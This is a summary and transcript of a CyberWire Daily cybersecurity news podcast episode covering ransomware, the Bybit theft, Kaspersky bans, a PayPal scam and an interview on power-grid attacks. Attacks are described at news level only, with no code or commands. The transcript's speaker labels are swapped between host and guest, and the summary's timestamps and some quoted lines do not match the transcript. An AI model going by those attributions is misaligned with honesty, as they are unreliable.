Can the U.S. keep up in cyberspace? - CyberWire Daily

Summary10 min read

CyberWire Daily: Can the U.S. Keep Up in Cyberspace?
Release Date: February 24, 2025
Host: Dave Buettner, N2K Networks

Overview

In this episode of CyberWire Daily, host Dave Buettner delves into pressing cybersecurity challenges facing the United States, exploring whether the nation can maintain its competitive edge in the rapidly evolving digital battleground. The discussion encompasses warnings from retired military leaders, international cybersecurity measures, significant cyberattacks, emerging vulnerabilities, legislative efforts on data privacy, and real-world implications of cyber threats on critical infrastructure.

Retired General Paul Nakasone's Warning: The U.S. Falling Behind

[02:30] Retired General Paul Nakasone, now at Vanderbilt University, issued a stark warning about the United States lagging in cyberspace. Speaking at DistrictCon in Washington D.C., Nakasone highlighted the expanding capabilities of adversaries, notably citing “Chinese-backed breaches and ransomware attacks” as indicators of the nation’s weakened cybersecurity posture.

General Paul Nakasone: “The U.S. is falling behind in cyberspace with adversaries expanding their capabilities.” ([02:45])

He expressed concerns over the potential for cyber operations to cause physical damage, predicting future attacks could “disable platforms through digital means”. Nakasone emphasized the increasing role of Artificial Intelligence in cyber offense, including autonomous AI-powered drones, questioning the safeguards against “AI-driven cyberweapons” that might bypass traditional defenses.

Advocating for a more aggressive U.S. cyber strategy, Nakasone referenced past cyber command operations targeting Russian and Iranian hackers, advocating for “persistent engagement” to keep cyber adversaries in check. He also pointed out the urgent need for top cyber talent, lamenting the recruitment challenges posed by past government actions.

Australia Bans Kaspersky Products for Government Use

[05:10] Australia has taken a significant step by mandating that all government entities “remove and ban Kaspersky products” due to security concerns linked to potential Russian government influence. The Department of Home Affairs issued an order requiring the elimination of Kaspersky software from federal systems by April 1, aligning with the U.S. ban initiated in 2017 and expanded in 2024.

This decision follows similar actions by several European nations that have long barred Kaspersky, prompting the company to exit the U.S. market by selling its customer base to Ultra AV. However, the transition has encountered challenges, including operational issues for new customers.

The Australian government’s move underscores growing international mistrust towards Kaspersky, although the company has yet to formally respond to the ban.

Fatal RAT Targets Industrial Organizations in APAC Region

[08:25] Researchers from Kaspersky ICS CERT have identified a sophisticated cyber espionage campaign utilizing the Fatal Remote Access Trojan (RAT) to target industrial organizations across the Asia-Pacific (APAC) region. This campaign, attributed to Chinese-speaking hackers, exploits legitimate cloud services like Udial Cloud Notes and Tencent Cloud to evade detection.

The targeted sectors include manufacturing, energy, IT, and logistics in countries such as Taiwan, China, Japan, Thailand, and Singapore. Attackers employ phishing emails and messaging platforms like WeChat and Telegram, disguising malware as tax documents. The Infection process involves advanced evasion techniques, including DLL sideloading and anti-virtual machine checks, enabling the RAT to “log keystrokes, exfiltrate data, and execute destructive commands” like MBR corruption.

Kaspersky ICS CERT: “Fatal RAT poses significant risks to operational technology systems. We advise network segmentation and rigorous monitoring to mitigate these threats.” ([08:50])

Preventative measures recommended include network segmentation, monitoring for known indicators of compromise, and blocking malicious DLLs to protect against such targeted attacks.

Bybit Cryptocurrency Exchange Faces $1.5 Billion Theft

[11:15] Bybit, a major cryptocurrency exchange, reported a devastating cyberattack resulting in the theft of $1.5 billion in digital assets. Hackers exploited a vulnerability in Bybit's smart contract logic, gaining unauthorized access to an ETH cold wallet and transferring over 400,000 ETH and Steth tokens.

The attack likely involved exploiting flaws in the Safe Global platform's user interface. Despite the massive withdrawal requests, Bybit reassured users that their funds remain secure, with CEO Ben Zhao stating, “The exchange is solvent and can cover the loss with its $20 billion in assets if needed.”

This incident occurs amid a surge in crypto-related cybercrime, with Chainalysis reporting a 20% increase in stolen funds in 2024 compared to the previous year.

Apple Removes End-to-End Encryption for iCloud in the UK

[14:00] In a controversial move, Apple has removed end-to-end encryption (E2E) for iCloud services in the United Kingdom following demands under the Investigatory Powers Act, commonly known as the Snoopers’ Charter. Security and consumer rights advocates have criticized the decision, arguing it compromises user privacy and could weaken the UK’s data security reputation.

Apple Representative: “Creating an E2E backdoor would compromise all users' security. Instead, we've removed the advanced data protection feature for UK customers.” ([14:15])

Privacy experts warn that weakening encryption could lead to compliance issues for businesses and jeopardize data sharing agreements with the EU and the U.S. Apple defends its stance by emphasizing the balance between user security and lawful access, but the decision has sparked significant debate over government oversight versus individual privacy rights.

Lockbit Ransomware Exploits Windows Confluence Server

[16:40] Security researchers at DFIR Uncovered a Lockbit ransomware attack exploiting a vulnerability in Windows Confluence servers. The attackers initiated the breach through a remote code execution vulnerability, swiftly deploying tools like Mimikatz, Metasploit, and AnyDesk to escalate privileges and move laterally across the network via RDP.

Data was exfiltrated using rclone to Mega.IO before the ransomware was deployed, encrypting critical systems within just two hours. The attackers leveraged PDQ Deploy to automate the spread of Lockbit, ensuring widespread encryption.

Researchers highlighted the necessity of “patching Confluence vulnerabilities, monitoring network activity, and restricting remote access” to prevent similar intrusions, underscoring the increasing sophistication and speed of ransomware operations targeting unpatched enterprise applications.

Zero Day Vulnerabilities in Cloud Logging Utility Fluentbit

[19:05] Tenable researchers have discovered zero-day vulnerabilities in Fluentbit, a widely used logging utility embedded in cloud platforms such as AWS, Google Cloud, and Microsoft Azure. These vulnerabilities exploit null pointer dereference weaknesses in the Prometheus remote write and OpenTelemetry plugins, potentially exposing billions of production environments to cyber threats.

Attackers can exploit these flaws through simple HTTP requests to crash Fluentbit servers or leak sensitive data. The affected systems include Kubernetes deployments, enterprise logging systems, and compliance workflows used by major organizations like Cisco, Splunk, and VMware.

Tenable Researcher: “Immediate updates and stringent API access restrictions are crucial to prevent widespread service disruptions and data leaks.” ([19:30])

While patches are available, many systems remain vulnerable due to delayed updates, prompting experts to urge organizations to prioritize applying these fixes and conducting comprehensive security audits.

PayPal Email Scam Tricking Users into Calling Scammers

[21:00] A new email scam exploiting PayPal’s legitimate email infrastructure has emerged, tricking users into contacting scammers directly. The scam involves sending fake purchase confirmations from serviceaypal.com, leveraging PayPal’s address settings to insert fraudulent messages into the “from” field.

Recipients receive emails stating that their shipping address for a MacBook purchase has changed, urging them to call a fake PayPal support number. Once on the call, scammers persuade victims to install remote access software, leading to the theft of funds, data, or malware deployment.

Cybersecurity Expert: “These fraudulent emails bypass traditional security filters by originating directly from PayPal’s servers. Users must verify their accounts directly through PayPal and avoid calling suspicious numbers.” ([21:20])

Experts recommend that PayPal limit character input in address fields to prevent abuse and advise users to remain vigilant against such scams by verifying account activities through official channels.

House Republicans Seek Public Input on National Data Privacy Standards

[23:45] Republican leaders on the House Energy and Commerce Committee, including Brett Guthrie (Kentucky) and John Joyce (Pennsylvania), have initiated a request for public input to shape national data privacy and security standards. The aim is to craft legislation that safeguards Americans' digital data across various services, addressing challenges posed by rapid technological advancements and fragmented state and federal laws.

Their request seeks insights on:

Data Collection Practices
Transparency Measures
User Consent Mechanisms
Lessons from International Privacy Laws

Additionally, they are exploring how a federal privacy law would interact with existing regulations like HIPAA, FCRA, and COPPA. The public is invited to submit responses by April 7, with the hope of establishing baseline privacy protections akin to those in other Western nations.

This marks a significant step towards unified data privacy legislation, aiming to reconcile diverse regulations and provide comprehensive protection for consumers in the digital age.

Michigan Man Charged for Utilizing Genesis Cybercrime Marketplace

[25:10] The U.S. Department of Justice has charged Andrew Szenkovsky, 29, for his involvement with the Genesis Cybercrime Marketplace. Szenkovsky reportedly purchased 2,500 stolen login credentials from the marketplace in 2020, using them to illicitly transfer funds from a bank account and attempting to sell data on RAIDforums, a now-dismantled cybercrime platform.

He faces multiple charges, including wire fraud and identity theft, with his arraignment scheduled for the week. The Genesis Market, seized by the FBI in April 2023, had previously facilitated access to stolen credentials, leading to the arrest of 120 individuals, though its administrators remain at large.

This case underscores the persistent threat posed by cybercrime marketplaces and the ongoing efforts by law enforcement to dismantle these illicit operations.

In-Depth Conversation: The Domino Effect of a Cyber Attack on the Power Grid

[17:01] Host Dave Buettner engages in a comprehensive discussion with Carl Sigler, Senior Security Research Manager at Trustwave Spider Labs, focusing on the domino effect of cyberattacks on the power grid.

Rising Ransomware Threats

[17:32] Buettner highlights a staggering 80% increase in ransomware attacks in the past year, indicating that threat actors are intensifying their focus on ransomware exploitation.

Carl Sigler: “Ransomware actors are not giving up; they're actively increasing their efforts and sophistication.” ([17:53])

Impact on Utilities Sector

Sigler explains that the utilities sector is particularly attractive to hackers due to its interdependence with all other industries. An attack on utilities like gas or electricity can disrupt hospitals, transportation, and essential services, exerting immense pressure on these organizations to resolve issues swiftly.

Sigler: “Attackers know that targeting utilities creates massive pressure because it affects everything from hospitals to transportation.” ([19:46])

Techniques and Tactics

The conversation delves into the prevalent use of phishing as the primary attack vector, responsible for 84% of compromises in the energy and utility sector.

Sigler: “Phishing remains the number one method for initial breaches, especially as AI makes these attacks harder to detect.” ([22:01])

Defense Capabilities and Challenges

Despite the critical nature of their operations, many utility companies struggle with outdated infrastructure and stringent regulatory requirements that hinder timely updates and security enhancements.

Sigler: “Forty percent of the U.S. power grid is over 50 years old, making it a vulnerable target due to aging technology and resistance to change.” ([23:15])

Recommendations for Protection

To mitigate risks, Sigler advocates for:

Comprehensive Asset Identification: Maintaining an up-to-date inventory of all network assets to understand and manage risks effectively.
Proactive Threat Hunting: Actively searching for Indicators of Compromise (IOCs) relevant to the sector to reduce the dwell time of threat actors.
Robust Incident Response Plans: Establishing well-defined processes to respond swiftly and effectively to breaches.

Sigler: “Asset identification and proactive threat hunting are essential. Additionally, having a formalized incident response plan can make the difference between containment and catastrophe.” ([24:28])

The discussion underscores the urgent need for the utilities sector to modernize infrastructure, enhance cybersecurity measures, and develop resilient response strategies to withstand and mitigate the impact of sophisticated cyberattacks.

Meta Sues Instagram Extortionist Idris Kiba

[26:45] In a recent high-profile case, Meta (formerly Facebook) has filed a lawsuit against Idris Kiba, accused of running an extortion ring named Unlocked for Life on Instagram. Kiba manipulated Instagram’s reporting system to ban and unban accounts for profit, boasting over 200 subscribers and generating $600,000 monthly.

Victims were coerced through threats, racial slurs, and even graphic images, with Kiba demanding up to $20,000 to cease harassment. By gaming the platform's automated moderation, he ensured swift account disables, offering restoration services to paying victims while continuing to exploit those who refused.

Meta Statement: “Idris Kiba weaponized our enforcement system, turning a security feature into a lucrative extortion racket.” ([26:50])

Meta responded to his actions by issuing a cease and desist order in February 2024, which led to Kiba creating new accounts to continue his scheme. The lawsuit aims to hold him accountable and prevent future exploitation of the platform’s security mechanisms.

Conclusion

This episode of CyberWire Daily provides a comprehensive overview of the multifaceted cybersecurity landscape, highlighting the critical areas where the United States faces significant challenges in keeping pace with global adversaries. From warnings by military experts and international cybersecurity policies to real-world cyberattacks and legislative efforts, the discussion underscores the urgent need for robust strategies, advanced technological defenses, and cohesive policy frameworks to safeguard national and economic security in the digital age.

For those seeking to delve deeper into these topics, Carl Sigler’s insights from Trustwave Spider Labs offer valuable perspectives on defending critical infrastructure against sophisticated cyber threats.

Stay informed and secure by tuning into CyberWire Daily, your essential source for the latest in cybersecurity news and analysis.

Loading summary

Transcript16 lines

[00:02]
Dave Buettner
You're listening to the Cyberwire network, powered by N2K.
[00:13]
Carl Sigler
Hey everybody, Dave here. Have you ever wondered where your personal information is lurking online? Like many of you, I was concerned about my data being sold by data brokers, so I decided to try Deleteme. I have to say, Deleteme is a game changer. Within days of signing up, they started removing my personal information from hundreds of data brokers. I finally have peace of mind knowing my data privacy is protected. Deleteme's team does all the work for you with detailed reports so you know exactly what's been done. Take control of your data and keep your private life private by signing up for Deleteme now at a special discount for our listeners today. Get 20% off your delete me plan when you go to JoinDeleteMe.com N2K and use promo code N2K at checkout. The only way to get 20% off is to go to JoinDeleteMe.comN2K and enter code N2K at checkout. That's JoinDeleteMe.com N2k code N2K Retired General Paul Nakasone warns the US is falling behind in cyberspace. Australia orders government entities to remove and ban Kaspersky products. Fatal rat targets industrial organizations in the APAC region. A major cryptocurrency exchange reports the theft of $1.5 billion in digital assets. Apple removes end to end encryption for iCloud. In the UK researchers uncover a Lockbit ransomware attack exploiting a Windows Confluence server. Researchers uncover zero day vulnerabilities in a widely used cloud logging utility. A PayPal email scam is tricking users into calling scammers. Republican leaders in the House request public input on national data privacy standards. A Michigan man faces charges for his use of the Genesis Cybercrime marketplace. Our guest is Carl Sigler, Senior Security Research Manager from Trustwave Spider Labs, explaining the domino effect of a cyber attack on the power grid and meta sues an Insta extortionist. It's Monday, February 24th, 2025. I'm Dave Buettner and this is your Cyberwire Intel Brief. Happy Monday and thanks for joining us. It is great to have you here with us. Retired General Paul Nakasone warned that the US is falling behind in cyberspace with adversaries expanding their capabilities. Speaking over the weekend at District con in Washington D.C. he cited Chinese backed breaches and ransomware attacks as evidence of weak cybersecurity. He also expressed concern about cyber operations causing physical damage, predicting future attacks could disable platforms through digital means. Nakasone, now at Vanderbilt University, highlighted AI's role in cyber offense, including autonomous targeting by AI powered drones. He questioned the limits of AI driven cyberweapons and their ability to bypass defenses. He endorses a more aggressive US Cyber strategy, citing past cyber command operations against Russian and Iranian hackers. He emphasized persistent engagement to keep cyber enemies in check. Nakasone stressed the need for top cyber talent, warning of recruitment challenges due to past government actions. He acknowledged ongoing cyber command reforms but avoided direct criticism of political leadership changes, stating that presidents choose their own advisers. Australia has ordered government entities to remove and ban Kaspersky products, citing security risks. The order, issued by the Department of Home affairs requires all federal systems to eliminate Kaspersky software by April 1, though no specifics were provided. The move aligns with concerns over Russian government influence on the company. The decision follows a similar US ban, which began in 2017 and expanded in 2024, leading Kaspersky to exit the US market. The company sold its US customer base to Ultra AV, though the transition faced issues. While Australia previously monitored US actions without immediate restrictions, it has now joined other countries in barring Kaspersky from government networks. Several European nations have already blocked the company's product for years. Kaspersky has yet to comment on Australia's decision. Meanwhile, according to researchers with Kaspersky ICS cert, Chinese speaking hackers are targeting industrial organizations across the Asia Pacific region with the Fatal RAT Remote Access Trojan. The cyber espionage campaign exploits legitimate Chinese cloud services including including Udial Cloud Notes and Tencent Cloud to evade detection. The attack focuses on manufacturing, energy, IT and logistics sectors in Taiwan, China, Japan, Thailand and Singapore. Hackers distribute phishing emails and WeChat or Telegram messages disguised as tax documents to deliver malware. The infection process involves multiple evasion techniques, including DLL sideloading and anti virtual machine checks. Fatal RAT logs, keystrokes, exfiltrates data and allows remote execution of destructive commands like MBR corruption. Kaspersky warns of risks to operational technology systems and advises network segmentation, DLL sideloading, monitoring and blocking known indicators of compromise. Bybit, a major cryptocurrency exchange, reported a cyber attack that led to the theft of $1.5 billion in digital assets. Hackers exploited a vulnerability in the Smart contract logic, gaining control of an ETH cold wallet and transferring over 400,000 ETH and Steth. The attack may have involved a flaw in the safe global platform's user interface. Despite a surge in withdrawal requests, Bybit assured users their funds remain secure. CEO Ben Zhao stated the exchange is solvent and can cover the loss with its $20 billion in assets if needed. The attack comes amid rising crypto related cybercrime, with Chainalysis reporting $2.2 billion stolen in 2024, a 20% increase from the previous year. Apple has removed end to end encryption for iCloud in the UK, following secret data access demands from the government under the Investigatory Powers act, sometimes referred to as the Snoopers Charter. Security and consumer rights experts are calling for lawmakers to hold the government accountable. Apple argues that creating an E2E backdoor for the government would compromise all users security. Instead, it removed the advanced data protection feature for UK customers, disappointing privacy advocates. Experts warn this decision could weaken the UK's data security reputation and impact data flows with the EU. Critics say the move sets a dangerous precedent, emboldening other governments to demand similar access. Some warn it could lead to compliance issues for businesses operating in Europe and even threaten the UK's data sharing agreement with the US. Security researchers at the DFIR report have uncovered a lockbit ransomware attack that exploited a Windows confluent server. The attackers gained initial access through a remote code execution vulnerability, quickly deploying Mimikatz, Metasploit and AnyDesk to escalate privileges and move laterally across the network via rdp. They used rclone to exfiltrate data to Mega IO before executing the ransomware. PDQ deploy was leveraged to automate the spread of lockbit across critical systems, ensuring widespread encryption. The entire attack, from initial compromise to ransomware deployment, was completed in just two hours. The researchers emphasized the importance of patching confluence vulnerabilities, monitoring network activity and restricting remote access to prevent similar intrusions. This case underscores the growing sophistication and speed of ransomware operations targeting unpatched enterprise applications. Security researchers at Tenable uncovered zero day vulnerabilities in fluentbit, a widely used logging utility embedded in cloud platforms like aws, Google Cloud and Microsoft Azure. The flaws exploit null pointer dereference weaknesses in the Prometheus remote write and open telemetry plugins, exposing billions of production environments to cyber threats. Attackers can crash fluent bit servers or leak sensitive data using simple HTTP requests. These vulnerabilities affect kubernetes deployments, enterprise logging systems, and compliance workflows with major users, including Cisco, Splunk and VMware. Patches are available, but unpatched systems remain at high risk. Experts urge immediate updates, API access restrictions and security audits to prevent widespread service disruptions and data leaks. A paypal email scam is tricking users into calling scammers by sending fake Purchase confirmations from PayPal's legitimate email address, serviceaypal.com the scam exploits PayPal's address settings, allowing attackers to insert fraudulent messages into the address to field. Victims receive an email stating that their shipping address has changed for a MacBook purchase and are urged to call a fake PayPal support number. Once on the call, scammers convince victims to install remote access software enabling theft of funds, data or malware deployment. The emails bypass security filters because they originate directly from PayPal's servers. Users are advised to ignore the email, verify their account directly via PayPal, and not call the provided number. Experts recommend PayPal limit character input in address fields to prevent abuse. Republican leaders on the House Energy and Commerce Committee, Brett Guthrie from Kentucky and John Joyce from Pennsylvania, are requesting public input on how to develop national data privacy and security standards. They issued a request for information to guide legislation that would protect Americans digital data across various services. The lawmakers acknowledged the challenges posed by rapid technological advancements and conflicting state and federal laws. Their request seeks insights on data collection, transparency, user consent and lessons from international privacy laws. They also want input on how a federal privacy law would interact with existing regulations like hipaa, FCRA and coppa. Congress has long debated digital privacy legislation, but past efforts have failed due to political disagreements. The public can submit responses by April 7. Lawmakers hope to finally establish baseline privacy protections similar to those in other western nations. The U.S. justice Department has charged Andrew Szenkovsky, age 29, for purchasing 2,500 stolen login credentials from the Genesis Market CyberCrime Marketplace in 2020. Authorities say he used stolen credentials to steal money from a bank account and attempted to sell data on RAIDforums, a now dismantled cybercrime site. Schenkovsky faces charges including wire fraud and identity theft. His arraignment hearing is this week. The Genesis Market, seized by the FBI in April 2023, had provided cybercriminals access to stolen credentials. While 120 people were arrested, the site's administrators remained at large and and its dark web presence later disappeared. The Justice Department previously charged a Buffalo police detective for buying stolen credentials from the site. Coming up after the break, my conversation with Carl Sigler from Trustwave Spider Labs. He's explaining the domino effect of a cyber attack on the power grid and meta sues an Insta extortionist. Stay with us. We've all been there. You realize your business needs to hire someone yesterday? How can you find amazing candidates fast well, it's easy. Just use Indeed when it comes to hiring, Indeed is all you need. Stop struggling to get your job post noticed. Indeed Sponsored Jobs helps you stand out and hire fast. Your post jumps to the top of search results so the right candidates see it first and it works. Sponsored Jobs on indeed get 45% more applications than non sponsored ones. One of the things I love about Indeed is how fast it makes hiring. And yes, we do actually use Indeed for hiring here at N2K CyberWire. Many of my colleagues here came to us through Indeed plus with Sponsored Jobs. There are no subscriptions, no long term contracts. You only pay for results. How fast is Indeed? Oh, in the minute or so that I've been Talking to you, 23 hires were made on Indeed According to Indeed Data Worldwide. There's no need to wait any longer. Speed up your hiring right now with Indeed and listeners to this show will get a $75 sponsored job credit. To get your jobs more visibility@indeed.com cyberwire just go to indeed.com cyberwire right now and support our show by saying you heard about Indeed on this podcast. Indeed.com cyberwire terms and conditions apply. Hiring Indeed is all you need. Cyber threats are more sophisticated than ever. Passwords. They're outdated and can be cracked in a minute. Cybercriminals are intercepting SMS codes and bypassing authentication apps. While businesses invest in network security, they often overlook the front door, the login. Yubico believes the future is passwordless. Yubikeys offer unparalleled protection against phishing for individuals, SMBs and enterprises. They deliver a fast, frictionless experience that users love. Yubico is offering N2K followers a limited buy one, get one offer. Visit yubico.com N2K to unlock this deal. That's Yubico. Say no to modern cyber threats. Upgrade your security today. Carl Sigler is senior security Research Manager at Trustwave Spider Labs. I recently sat down with him to discuss the domino effect of a cyber attack on the power grid.
[17:01]
Dave Buettner
We've been focusing on the security issues, the risks taken on the threats that are affecting specific industry sectors. So we do healthcare, we do hospitality, retail, and right now we're currently focused on energy and utilities.
[17:21]
Carl Sigler
Well, let's dig into some of the details here. You all were tracking ransomware incidents and some of the changes that you've seen in the past couple years there.
[17:32]
Dave Buettner
Yeah, and it's actually a little bit surprising just how much ransomware has increased over the years. Just this past year is up 80% over 20, 23 so yeah, they, these threat actors are not giving up on ransomware at all. They're doubling, tripling, quadrupling down on the use of ransomware.
[17:54]
Carl Sigler
One of the things that the research points out is the potential domino effect, as you put it, of a cyber attack on the power grid. Can you describe to us what that could entail?
[18:06]
Dave Buettner
Sure. I mean, we have direct examples of how that cascade, how that domino effect works. We saw it with the Colonial pipeline breakdown, if you will, ransomware. The threat actors from Darkside encrypted the Colonial pipeline system and that basically prevented gas from getting to the east coast of the United States. That outage, which lasted I think a little bit over 18 days, that affected airports. For instance, I'm in Atlanta, Georgia and the Hartsfield airport had fueling problems. Some flights had to be redirected to refuel in new cities. Some flights were canceled. That has a direct cascading effect to business meetings. Right. If I can't fly to get to that conference in time, I might lose a business deal. Same thing for just driving. This affected the south to a large extent. And there are a lot of people that their business is driving around. It could be delivery, it could be long haul trucking, things like that. But if you don't have gas, that business shuts down. This had a huge economic impact. Prices of gasoline went up to the highest it had been in over six years. And that, that is absolutely going to cascade that economic impact on, cascade through the entire nation. So yeah, one single little attack can have real widespread repercussions.
[19:33]
Carl Sigler
One of the things your research tracks here is that there's been a real rise in cyber attacks targeting the utilities sector. Can you add some insight to that? I mean, what makes them an attractive target?
[19:46]
Dave Buettner
A lot of things make the utility sector a very juicy target for these hackers and criminals out there. One, it's interdependence with everything. Right. We just talked about the domino effect, the cascade effect. When you attack gas, water, electricity, you are affecting all kinds of industries and businesses. You're basically taking over the supply chain for those critical utilities that we need to go through our day to day activities. So whether it's gasoline, whether it's electricity, and you think of how that might affect a hospital. For instance, there was a ransomware attack on a hospital that required redirecting, you know, critically ill emergency room type patients to other hospitals. There is at least one death associated with that. So these threat actors, these criminals know that if they can take a hold of a utility company, the pressure on that utility company to resolve that issue is massive because of that cascade effect, because sometimes human lives are on the line. Colonial Pipeline, they ended up paying the four million dollar ransom in that case, which is something we don't want to get to. We don't want to have a situation where we're actually funding the criminal underground. So yeah, these are really important organizations. By leveraging attacks against them, you can really twist their arm and get that payout. And we also see this in just a destructive way. We see this with the Russia Ukraine conflict right now, where Russia and Ukraine are targeting each other's infrastructures, utility, energy, gas, you name it. And they don't care about trying to get any sort of economic result out of that. They're just looking to crash those systems to cause chaos and to eliminate resources for the other country. So there's all kinds of reasons why the energy and utility sector is directly targeted, but it's just a often vulnerable and very juicy target for a lot of reasons for these criminals.
[21:55]
Carl Sigler
And what are the techniques and the tactics that you're seeing them use here?
[22:01]
Dave Buettner
Oh, primarily phishing. I know every single security talk always talks about phishing. And there's a good reason why we do it. Because phishing, especially in this case, was the initial first compromise, that initial first breach of 84% of the compromises in the energy and utility sector based on our own research. And phishing has gotten a lot more difficult to identify. The the days of being able to identify red flags like poor grammar, poor punctuation, not really knowing the industry that well, especially when it comes to business email compromise, those red flags are going away. A lot of these threat actors are using artificial intelligence to craft their phishing emails and make them more alluring to their potential victims. So phishing is absolutely the number one thing that gets them in there. And it's probably should be the number one concern for protection controls that you put in place.
[23:02]
Carl Sigler
Where does the utility sector stand in terms of their capabilities for defending themselves? Are they, are they well resourced to do this or is that an ongoing struggle?
[23:15]
Dave Buettner
It's absolutely an ongoing struggle. We saw that. Let me see that statistic. Yeah. 40% of the U.S. power grid is over 50 years old. You know that infrastructure is aging quickly and when it comes to technology, things age quicker than say the just old pipelines that used to have. So that's definitely a huge issue. And a lot of times it's because they're change adverse, they're being held to specific regulations, specific auditing, and they need to make sure that they are going to pass those audits every single year or every single month. So they're not going to change anything unless it's broken. You'll find operating systems that have been abandoned, no longer getting security patches. All these things make the utility sector a lot more. They take on a lot more risk than they probably should, I'll put it that way.
[24:18]
Carl Sigler
Well, based on the information that you all have gathered here, what are your recommendations then? I mean, how should these folks go about best protecting themselves?
[24:28]
Dave Buettner
You know, a lot of the advice that we've been giving for decades sometimes is still the best advice. I will say from a mitigation standpoint, just knowing what your assets are, you know, just doing an inventory, not relying on a network diagram that somebody put together three years ago. But know exactly what you have on your networks, then you can start to get a feel for what risk those assets may be at. But if you don't know what you have, you don't know what risk you're undertaking. So asset identification is going to help you quite a bit. Proactive threat hunting. Sometimes you can't wait for these alerts to just pop up on your console. You have to go searching for this activity. So ingesting current IOCs for current campaigns that apply to your business sector apply to your organization and actively looking for those indicators like malware hashes, registry keys, things like that can help you identify things, limit the dwell time of those threat actors. I'd also say that something that's often missing I see in a lot of organizations is the incident response process. I see a lot of organizations that are so focused on proactive prevention of attacks that once they actually do get attacked, once they've been compromised in some fashion, they're not sure what to do at that point. They don't have a good formalized incident response plan in place.
[25:52]
Carl Sigler
That's Carl Sigler from Trustwave Spider Labs. We will have a link to their report in our show Notes. Do you know the status of your compliance controls right now? Like right now? We know that real time visibility is critical for security, but when it comes to our GRC programs, we rely on point in time checks. But get this. More than 8,000 companies like Atlassian and Quora have continuous visibility into their controls with Vanta. Here's the gist. Vanta brings automation to evidence collection across 30 frameworks like Society2 and ISO 27001. They also centralize key workflows like policies, access reviews and reporting and helps you get security questionnaires done five times faster with AI. Now that's a new way to GRC. Get $1,000 off Vanta when you go to vanta.com cyber that's vanta.com cyber for $1,000 off. And finally, imagine paying rent on your own Instagram account. That's basically what Idris Kiba was making people do until Meta decided enough was enough. The company is suing Kibah, accusing him of running an extortion ring called Unlocked for Life, where he banned and unbanned Instagram accounts for profit. And he wasn't shy about it. He bragged on the no Jumper podcast that he had over 200 subscribers and raked in $600,000 a month. But Kiba wasn't just scamming influencers. He allegedly sent death threats, racial slurs, and even pictures of bloodied victims to those who didn't comply. He even demanded $20,000 from one victim to stop harassing them. Kiba's Unlocked for Life scheme worked by gaming Instagram's reporting system to ban and unban accounts at will. Here's how he allegedly did it. Kiba would submit false reports claiming that a target's Instagram account violated the platform's rules, things like impersonation, hate speech, nudity, or other violations. Instagram's automated moderation system often acted swiftly, disabling accounts the same day. Based on these reports, after getting an account banned, Kiba would offer to help restore it for a price. Victims who paid his fee would see their accounts reinstated, while those who refused faced threats, harassment, and continued account takedowns. Meta hit back in February 2024 with a cease and desist banning his accounts. But Kiba, ever the entrepreneur, just made new ones. Essentially, Kiba weaponized Instagram's own enforcement system against its users, turning a security feature into an extortion racket. Now Meta is suing him. Let's hope Meta's legal team proves harder to evade than their AI moderators. And that's the Cyberwire. We'd love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like our show, please share a rating and review in your favorite podcast app. Please also fill out the survey in the show notes or send an email to cyberwire2k.com we're privileged that N2K Cyberwire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world's preeminent intelligence and law enforcement agencies. N2K's senior producer is Alice Carruth. Our Cyberwire producer is Liz Stokes. We're mixed by Trey Hester with original music and sound design by Elliot Peltzman. Our executive producer is Jennifer Ibin. Peter Kilby is our publisher. And I'm Dave Bittner. Thanks for listening. We'll see you back here tomorrow. And now, a message from Blackcloak. Did you know the easiest way for cybercriminals to bypass your company's defenses is by targeting your executives and their families at home? Blackcloak's award winning digital executive protection platform secures their personal devices, home networks, and connected lives. Because when executives are compromised at home, your company is at risk. In fact, over one third of new members discover they've already been breached. Protect your executives and their families 247365 with BlackCloak. Learn more at BlackCloak IO.